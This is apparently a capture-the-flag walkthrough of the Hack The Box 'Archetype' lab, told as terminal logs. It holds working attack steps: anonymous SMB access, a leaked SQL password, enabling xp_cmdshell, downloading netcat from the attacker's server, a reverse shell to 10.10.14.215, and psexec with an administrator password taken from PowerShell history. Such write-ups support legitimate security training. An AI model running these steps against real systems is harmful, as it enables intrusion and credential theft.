01.ARCHETYPE (PRIVESC & MSSQL SERVER)

Protocols, MSSQL, SMB, Powershell, Reconnaissance, Remote Code Execution, Clear Text Credentials, Information Disclosure, Anonymous/Guest Access

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
 1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 49664/tcp open  msrpc        Microsoft Windows RPC
 49665/tcp open  msrpc        Microsoft Windows RPC
 49666/tcp open  msrpc        Microsoft Windows RPC
 49667/tcp open  msrpc        Microsoft Windows RPC
 49668/tcp open  msrpc        Microsoft Windows RPC
 49669/tcp open  msrpc        Microsoft Windows RPC
 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -PN option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 135,139,445,1433,5985,47001,49664-49669
 PORT   STATE SERVICE VERSION
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
 1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
 | ms-sql-info: 
 |   10.129.250.20:1433: 
 |     Version: 
 |       name: Microsoft SQL Server 2017 RTM
 |       number: 14.00.1000.00
 |       Product: Microsoft SQL Server 2017
 |       Service pack level: RTM
 |       Post-SP patches applied: false
 |_    TCP port: 1433
 | ms-sql-ntlm-info: 
 |   10.129.250.20:1433: 
 |     Target_Name: ARCHETYPE
 |     NetBIOS_Domain_Name: ARCHETYPE
 |     NetBIOS_Computer_Name: ARCHETYPE
 |     DNS_Domain_Name: Archetype
 |     DNS_Computer_Name: Archetype
 |_    Product_Version: 10.0.17763
 |_ssl-date: 2025-03-05T03:27:06+00:00; -1s from scanner time.
 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
 | Not valid before: 2025-03-05T03:22:42
 |_Not valid after:  2055-03-05T03:22:42
 5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 |_http-server-header: Microsoft-HTTPAPI/2.0
 |_http-title: Not Found
 47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 |_http-server-header: Microsoft-HTTPAPI/2.0
 |_http-title: Not Found
 49664/tcp open  msrpc        Microsoft Windows RPC
 49665/tcp open  msrpc        Microsoft Windows RPC
 49666/tcp open  msrpc        Microsoft Windows RPC
 49667/tcp open  msrpc        Microsoft Windows RPC
 49668/tcp open  msrpc        Microsoft Windows RPC
 49669/tcp open  msrpc        Microsoft Windows RPC
 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-03-04T19:27:01-08:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-05T03:26:58
|_  start_date: N/A
|_clock-skew: mean: 1h35m59s, deviation: 3h34m41s, median: -1s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 135,139,445,1433,5985,47001,49664-49669
 PORT   STATE SERVICE
 135/tcp   filtered msrpc
 139/tcp   filtered netbios-ssn
 445/tcp   filtered microsoft-ds
 1433/tcp  filtered ms-sql-s
 5985/tcp  filtered wsman
 47001/tcp filtered winrm
 49664/tcp filtered unknown
 49665/tcp filtered unknown
 49666/tcp filtered unknown
 49667/tcp filtered unknown
 49668/tcp filtered unknown
 49669/tcp filtered unknown

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit user flag and root flag.
#ENUMERATE SMB SHARES
root@htb:~$ smbclient -N -L \\\\{TARGET_IP}\\

 	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	
 Reconnecting with SMB1 for workgroup listing.
 do_connect: Connection to 10.129.250.20 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
 Unable to connect with SMB1 -- no workgroup available
 
 * the ADMIN$ & C$ cannot be accessed as the Access Denied error states; you can verify with the cmd "smbclient \\\\10.129.250.20\\ADMIN$"

 * the -N refers to "no password"
 * the -L is used to list available shares on the target
 
 
root@htb:~$ smbclient \\\\10.129.250.20\\backups -N
 Try "help" to get a list of possible commands.
 
smb: \> dir
 .                                   D        0  Mon Jan 20 06:20:57 2020
 ..                                  D        0  Mon Jan 20 06:20:57 2020
 prod.dtsConfig                     AR      609  Mon Jan 20 06:23:02 2020

	5056511 blocks of size 4096. 2499233 blocks available
	
smb: \> get prod.dtsConfig 
 getting file \prod.dtsConfig of size 609 as prod.dtsConfig (14.9 KiloBytes/sec) (average 14.9 KiloBytes/sec)

root@htb:~$ cat prod.dtsConfig 
 <DTSConfiguration>
  <DTSConfigurationHeading>
   <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
   <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
   </Configuration>
 </DTSConfiguration>
 
 * Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc
 
root@oco:~$ cd impacket/examples/
root@oco:~$ python3 mssqlclient.py -h
 Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies
 
root@oco:~$ python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
 Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies 

 Password:
 
 [*] Encryption required, switching to TLS
 [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
 [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
 [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
 [*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
 [*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
 [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
 [!] Press help for extra shell commands

 * the -windows-auth flag specifies the use of Windows Authentication
 
SQL (ARCHETYPE\sql_svc  dbo@master)> help
 lcd {path}                 - changes the current local directory to {path}
 exit                       - terminates the server process (and this session)
 enable_xp_cmdshell         - you know what it means
 disable_xp_cmdshell        - you know what it means
 xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
 sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
 ! {cmd}                    - executes a local shell cmd
#step 1: check role
SQL> SELECT is_srvrolemember('sysadmin');
 -
 1
 
 * 1 refers to boolean true, 0 refers to false
 
#step 2: check whether xp_command cmd execution is enabled; if not enable it
SQL> EXEC xp_cmdshell 'net user';
 ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

#step 3: enable xp_command cmd execution; this can be turned on by the adversary as they are currently logged in as sysadmin
SQL> EXEC sp_configure 'show advanced options', 1;
 INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.

SQL> RECONFIGURE;
SQL> sp_configure;
 name                                    minimum      maximum   config_value    run_value   
 ---------------------------------   -----------   ----------   ------------   ---------- 
 xp_cmdshell                                   0            1              0            0 

SQL> EXEC sp_configure 'xp_cmdshell', 1;
 INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
 
SQL> RECONFIGURE;
 
#step 4: proceed w/ enumeration
SQL> xp_cmdshell "whoami"
 output              
 -----------------   
 archetype\sql_svc

 NULL
 
#step 5: establish stable remote shell
SQL> xp_cmdshell "powershell -c pwd"
 output                
 -------------------   
 NULL                  
 Path                  
 ----                  
 C:\Windows\system32
 
 * determine where to put the reverse shell payload - the destination must be a regular user writable share; system32 is writable only by administrators
    - good candidates are: 
       - c:\users\{userName}\downloads
       - C:\Users\{userName}\AppData\Local\Temp
 
root@oco:~$ BROWSER > https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403---------------------- > Download RAW
 
 * place the raw executable in ~/Downloads 

root@oco:~$ sudo python3 -m http.server 8080

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; Invoke-WebRequest http://10.10.14.215:8080/nc64.exe -outfile nc64.exe"

 * The -c flag instructs the powershell to execute the command
 * Invoke-WebRequest is aliased as wget
 * 10.10.14.215:8080 is the attacker's payload server
 
SQL> xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
 output                                                                             
 --------------------------------------------------------------------------------   
 NULL                                                                               
 Directory: C:\Users\sql_svc\Downloads                                          
 NULL                                                                               
 Mode                LastWriteTime         Length Name                                                                     
 ----                -------------         ------ ----                                                                     
 -a----         3/8/2025   6:58 AM         226042 nc64.exe 

root@oco:~$ sudo nc -nlvp 443

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.215 443"

 * this cmd binds the cmd.exe (on the target) through the nc (nc64.exe uploaded to the target)to the attacker's listener
 * 10.10.14.215 is the attacker's IP where a netcat lister is active on port 443
 
root@oco:~$ nc....
 listening on [any] 443 ...
 connect to [10.10.14.215] from (UNKNOWN) [10.129.163.160] 49677
 Microsoft Windows [Version 10.0.17763.2061]
 (c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads> dir ..\Desktop
 dir ..\Desktop
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\Desktop

  01/20/2020  05:42 AM    <DIR>          .
  01/20/2020  05:42 AM    <DIR>          ..
  02/25/2020  06:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,720,813,056 bytes free

C:\Users\sql_svc\Downloads>type ..\Desktop\user.txt
 type ..\Desktop\user.txt
 3e7b102e78218e935bf3f4951fec21a3
#enumerate and identify privesc vulnerabilities
root@htb:~$ BROWSER > https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
 
 * place the raw executable in ~/Downloads
 
root@htb:~$ sudo python3 -m http.server 8080
 
C:\target> powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe
 powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe

C:\Users\sql_svc\Downloads>dir
 dir
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\Downloads

  03/08/2025  08:54 AM    <DIR>          .
  03/08/2025  08:54 AM    <DIR>          ..
  03/08/2025  07:12 AM            45,272 nc64.exe
  03/08/2025  08:54 AM         1,930,752 winPEASx64.exe
               2 File(s)      1,976,024 bytes
               2 Dir(s)  10,714,357,760 bytes free


C:\target> powershell -c C:\Users\sql_svc\Downloads\winPEASx64.exe
 ���������� Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    sql_svc::ARCHETYPE:1122334455667788:cc329849205c1f61e52fdc19e00aaccc:01010000000000002b788e114b90db014f2d23496717becc000000000800300030000000000000000000000000300000f11c34cbf3b69a899ead4a6e45502bc55e34a586839efe4a44845307169f1c090a00100000000000000000000000000000000000090000000000000000000000

 ...
 ���������� PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 79B
 ...
 ���������� Current Token privileges
 � Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
    SeAssignPrimaryTokenPrivilege: DISABLED
    SeIncreaseQuotaPrivilege: DISABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeIncreaseWorkingSetPrivilege: DISABLED
 ...
 ���������� Analyzing Windows Files Files (limit 70)
    C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    C:\Users\Default\NTUSER.DAT
    C:\Users\sql_svc\NTUSER.DAT
 ...
 
 * can target SeImpersonatePrivilege
 
C:\target> dir C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
 dir
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

 01/20/2020  05:04 AM    <DIR>          .
 01/20/2020  05:04 AM    <DIR>          ..
 03/17/2020  01:36 AM                79 ConsoleHost_history.txt
               1 File(s)             79 bytes
               2 Dir(s)  10,713,939,968 bytes free
 
C:\target> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
 net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
 exit
#escalate privileges
root@htb:~$ python3 psexec.py administrator@{TARGET_IP}
 Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies 

 Password: MEGACORP_4dm1n!!
 
 [*] Requesting shares on 10.129.241.250.....
 [*] Found writable share ADMIN$
 [*] Uploading file yQzLFkqG.exe
 [*] Opening SVCManager on 10.129.241.250.....
 [*] Creating service pQUO on 10.129.241.250.....
 [*] Starting service pQUO.....
 [!] Press help for extra shell commands
 Microsoft Windows [Version 10.0.17763.2061]
 (c) 2018 Microsoft Corporation. All rights reserved.

 * the password can't be given along with the cmd; it must be supplied afterward

C:\Windows\system32> whoami
  nt authority\system
 
C:\Windows\system32> cd c:\users
C:\Users> dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of c:\Users

 01/19/2020  03:10 PM    <DIR>          .
 01/19/2020  03:10 PM    <DIR>          ..
 01/19/2020  10:39 PM    <DIR>          Administrator
 01/19/2020  10:39 PM    <DIR>          Public
 01/20/2020  05:01 AM    <DIR>          sql_svc
               0 File(s)              0 bytes
               5 Dir(s)  10,695,737,344 bytes free

C:\Windows\Users> cd c:\users\Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of c:\Users\Administrator\Desktop

 07/27/2021  01:30 AM    <DIR>          .
 07/27/2021  01:30 AM    <DIR>          ..
 02/25/2020  06:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,695,774,208 bytes free
       
C:\Users\Administrator\Desktop> type root.txt
 b91ccec3305e98240082d4474b848528      

Last updated